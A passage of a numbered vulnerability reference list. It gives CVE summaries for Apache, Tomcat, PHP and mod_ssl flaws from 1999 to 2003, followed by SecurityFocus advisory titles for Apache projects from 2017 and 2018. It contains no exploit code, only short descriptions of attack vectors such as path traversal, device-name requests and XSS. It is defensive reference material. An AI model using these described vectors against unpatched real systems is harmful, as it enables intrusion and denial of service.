3481| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
3482| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
3483| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
3484| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
3485| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
3486| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
3487| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
3488| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
3489| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
3490| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
3491| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
3492| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
3493| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
3494| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
3495| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
3496| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
3497| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
3498| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
3499| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
3500| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
3501| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
3502| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
3503| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
3504| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
3505| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
3506| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
3507| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
3508| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
3509| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
3510| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
3511| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
3512| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
3513| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
3514| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
3515| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
3516| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
3517| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
3518| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
3519| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
3520| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
3521| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
3522| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
3523| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
3524| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
3525| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
3526| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
3527| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
3528| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
3529| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
3530| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
3531| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
3532| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
3533| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
3534| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
3535| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
3536| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
3537| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
3538| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
3539| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
3540| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
3541| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
3542| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
3543| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
3544| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
3545| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
3546| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
3547| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
3548| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
3549| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
3550| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
3551| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
3552| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
3553| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
3554| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
3555| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
3556| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
3557| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
3558| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
3559| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
3560| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
3561| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
3562| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
3563| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
3564| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
3565| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
3566| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
3567| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
3568| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
3569| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
3570| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
3571| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
3572| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
3573|
3574| SecurityFocus - https://www.securityfocus.com/bid/:
3575| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
3576| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
3577| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
3578| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
3579| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
3580| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
3581| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
3582| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
3583| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
3584| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
3585| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
3586| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
3587| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
3588| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
3589| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
3590| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
3591| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
3592| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
3593| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
3594| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
3595| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
3596| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
3597| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
3598| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
3599| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
3600| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
3601| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
3602| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
3603| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
3604| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
3605| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
3606| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
3607| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
3608| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
3609| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
3610| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
3611| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
3612| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
3613| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
3614| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
3615| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
3616| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
3617| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
3618| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
3619| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
3620| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
3621| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
3622| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
3623| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
3624| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
3625| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
3626| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
3627| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
3628| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
3629| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
3630| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
3631| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
3632| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
3633| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
3634| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
3635| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
3636| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
3637| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
3638| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
3639| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
3640| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
3641| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
3642| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
3643| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
3644| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
3645| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
3646| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
3647| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
3648| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
3649| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
3650| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
3651| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
3652| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
3653| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
3654| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
3655| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
3656| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
3657| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
3658| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
3659| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
3660| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
3661| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
3662| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
3663| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
3664| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
3665| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
3666| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
3667| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
3668| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
3669| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
3670| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
3671| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
3672| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
3673| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
3674| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
3675| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
3676| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
3677| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
3678| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
3679| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
3680| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
3681| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
3682| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
3683| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
3684| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
3685| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
3686| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
3687| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
3688| [100447] Apache2Triad Multiple Security Vulnerabilities
3689| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
3690| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
3691| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
3692| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
3693| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
3694| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
3695| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
3696| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
3697| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
3698| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
3699| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
3700| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
3701| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
3702| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
3703| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
3704| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
3705| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
3706| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
3707| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
3708| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
3709| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
3710| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
3711| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
3712| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
3713| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
3714| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
3715| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
3716| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
3717| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
3718| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
3719| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
3720| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
3721| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
3722| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
3723| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
3724| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
3725| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
3726| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
3727| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
